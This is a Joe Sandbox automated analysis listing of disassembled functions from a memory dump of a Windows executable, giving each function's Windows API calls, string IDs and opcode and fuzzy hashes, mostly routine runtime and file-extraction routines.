    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    • Opcode ID: fcdbbac6433eb15ba66b4fe2883590db0fabd17de6e1234a352f76928d54beb8
    • Instruction ID: d040480e68a3938dd10211eecfdcc00d06c7b56dabda4a9d56db88eef914f304
    • Opcode Fuzzy Hash: fcdbbac6433eb15ba66b4fe2883590db0fabd17de6e1234a352f76928d54beb8
    • Instruction Fuzzy Hash: 2541D871900665AFCB559FA8CD19AEE7BB8EF05311F00002AFD05F7246DB30AE598BE0
    Function 000B851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000B8532
    • _wcslen.LIBCMT ref: 000B8558
    • _wcslen.LIBCMT ref: 000B85EF
    • _wcslen.LIBCMT ref: 000B8657
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
      • Part of subcall function 000BB41F: RemoveDirectoryW.KERNEL32(?,?,?,000B8649,?), ref: 000BB430
      • Part of subcall function 000BB41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,000B8649,?), ref: 000BB45E
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    • Opcode ID: e83affd8d3f465c0e914ab22e26759c649bbe4c3e0ae7a2fcf4e1fc6b3fa74ce
    • Instruction ID: ff33ded7dd618f187fa32b7a6e395b1e82da27a9a538931b3177d43abada953d
    • Opcode Fuzzy Hash: e83affd8d3f465c0e914ab22e26759c649bbe4c3e0ae7a2fcf4e1fc6b3fa74ce
    • Instruction Fuzzy Hash: C231D971800658AACF31AF64CC45BEE73ADAF44340F05886AF955A7166EF70DEC5CB90
    Function 000DDB38 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,000D5AC4,00000000,00000000,000D6AF9,?,000D6AF9,?,00000001,000D5AC4,62E85006,00000001,000D6AF9,000D6AF9), ref: 000DDB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000DDC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000DDC20
    • __freea.LIBCMT ref: 000DDC29
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: cfc8418fa0f54325e58423fe63b4f35820497b70b5f246915f77690e310c5ac8
    • Instruction ID: faadae3f4e6fe3b6462c7a101dbaec04165283d2270845c81f5ba37f2db38431
    • Opcode Fuzzy Hash: cfc8418fa0f54325e58423fe63b4f35820497b70b5f246915f77690e310c5ac8
    • Instruction Fuzzy Hash: F9319A72A1020AABDF259F64DC85EEE7BA5EF00720F05456AFC04DA251EB35DD90CBA0
    Function 000CB663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • GetDC.USER32(00000000), ref: 000CB666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 000CB675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000CB683
    • ReleaseDC.USER32(00000000,00000000), ref: 000CB691
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    • Opcode ID: f589d872686c3230aac8d51cd1468fa4941a2e26dacc0f37509fdae73dbda47e
    • Instruction ID: f84935f69bc997eb39fc41d52d426b96da5838159009da3a68dafc8b4c575ba8
    • Opcode Fuzzy Hash: f589d872686c3230aac8d51cd1468fa4941a2e26dacc0f37509fdae73dbda47e
    • Instruction Fuzzy Hash: 1BE08C31A85B20EBD3215BA0BC0DBEA3F64AB9A712F088005FA0596590CBB454808FE1
    Function 000DC368 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 000DC4D4
      • Part of subcall function 000D51D6: IsProcessorFeaturePresent.KERNEL32(00000017,000D51A8,00000000,000DA154,00000000,00000000,00000000,00000016,?,?,000D51B5,00000000,00000000,00000000,00000000,00000000), ref: 000D51D8
      • Part of subcall function 000D51D6: GetCurrentProcess.KERNEL32(C0000417,000DA154,00000000,?,00000003,000DA588), ref: 000D51FA
      • Part of subcall function 000D51D6: TerminateProcess.KERNEL32(00000000,?,00000003,000DA588), ref: 000D5201
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
    • Instruction ID: 765e9cd902b21eb43d67b5914e17a3e72adf4e00c3a77dc5cac13247093231a9
    • Opcode Fuzzy Hash: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
    • Instruction Fuzzy Hash: C0516C75E0020AAFEF14DFA8C881ABDB7F5EF58314F24816AE855E7341E6759A01CB60
    Function 000B80BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B80C3
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000B8262
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    • Opcode ID: ae13258e08d5db40286b77fe053584477a82d5e65f13b9f7d9e4f4e06c6b3875
    • Instruction ID: 59f2a11796854ea3b0999172a383fbddb64acec4d4cba167285c3d0989faba7d
    • Opcode Fuzzy Hash: ae13258e08d5db40286b77fe053584477a82d5e65f13b9f7d9e4f4e06c6b3875
    • Instruction Fuzzy Hash: 04517471900558AAEB25EB60CC56EEE73BCEF46300F4040A9F609A6093DF749F89CF61
    Function 000CC66E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    • Opcode ID: c79ed17de95f8b0c8bbee1a4f5c99d61f17e85c1bf86e5a6e07f0533e0c5e2b8
    • Instruction ID: 84c91c4a96044f6d501b4b1f9628eafa4b66ee150b55827b6454ef37ffc29391
    • Opcode Fuzzy Hash: c79ed17de95f8b0c8bbee1a4f5c99d61f17e85c1bf86e5a6e07f0533e0c5e2b8
    • Instruction Fuzzy Hash: C421DE225083165AE731EB64D845FAFB3ECDF84760F04052EF648C2182EB64DD488BB2
    Function 000C0695 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000C0620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000C063F
      • Part of subcall function 000C0620: GetProcAddress.KERNEL32(000FA1F0,CryptUnprotectMemory), ref: 000C064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,000C0690), ref: 000C0723
    Strings
    • CryptUnprotectMemory failed, xrefs: 000C071B
    • CryptProtectMemory failed, xrefs: 000C06DA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 2d560d48cdee8c5492571eb3c7b1b4d5043bb0114527c66b871d33c80ed06284
    • Instruction ID: bebcd54d02488859a6cc9b454c849b7f389d76e57a48d32b884540e9c0697e6a
    • Opcode Fuzzy Hash: 2d560d48cdee8c5492571eb3c7b1b4d5043bb0114527c66b871d33c80ed06284
    • Instruction Fuzzy Hash: DF110631E04265EBEB195F20DC85FBE3B58EF40B64B01421AFD056F252DB34AD41DE95
    Function 000BCDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 000BCDE7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    • Opcode ID: a298fb1751ad1754244656bd96be641a7900b46e1c20822163361f0d629432a7
    • Instruction ID: 0c7ac2d29136efdb291fb0603371362f2f6a988c1fb03417812c8471824a991b
    • Opcode Fuzzy Hash: a298fb1751ad1754244656bd96be641a7900b46e1c20822163361f0d629432a7
    • Instruction Fuzzy Hash: 8601F563104311BAEA346B699C46EEFA7ECEF95360B40441BF454E6183FB30D840C2B1
    Function 000C22FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,000C2419,?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C2302
    • GetLastError.KERNEL32(?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C230E
      • Part of subcall function 000B76E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B7707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000C2317
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 01b1368e8b7f0888ffdaecbc0ca971446abc1457594b6ee82b40877f4c596772
    • Instruction ID: 36387f80e29a4341414b77a9b893df2311e3b0aaba9565e7c13a5955ad52680d
    • Opcode Fuzzy Hash: 01b1368e8b7f0888ffdaecbc0ca971446abc1457594b6ee82b40877f4c596772
    • Instruction Fuzzy Hash: D9D05B3550856137D60123386C09DEE79155F61774F240B15F339691F1CAB40A5142A5
    Function 000BF5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,000BED75,?), ref: 000BF5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000BED75,?), ref: 000BF5D1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: 971d1fe6decb0fd9db21538bf9c5db714d9ccd707a35c729167dfe7db2752d1d
    • Instruction ID: 56aca938ca07d2e310fc0e258adf44d446e55b1524258346ba8535dd6c8a8527
    • Opcode Fuzzy Hash: 971d1fe6decb0fd9db21538bf9c5db714d9ccd707a35c729167dfe7db2752d1d
    • Instruction Fuzzy Hash: 40C0123164479056E67467716C4DF832E985B04B15F050478B701EE1C0DAF9C8408760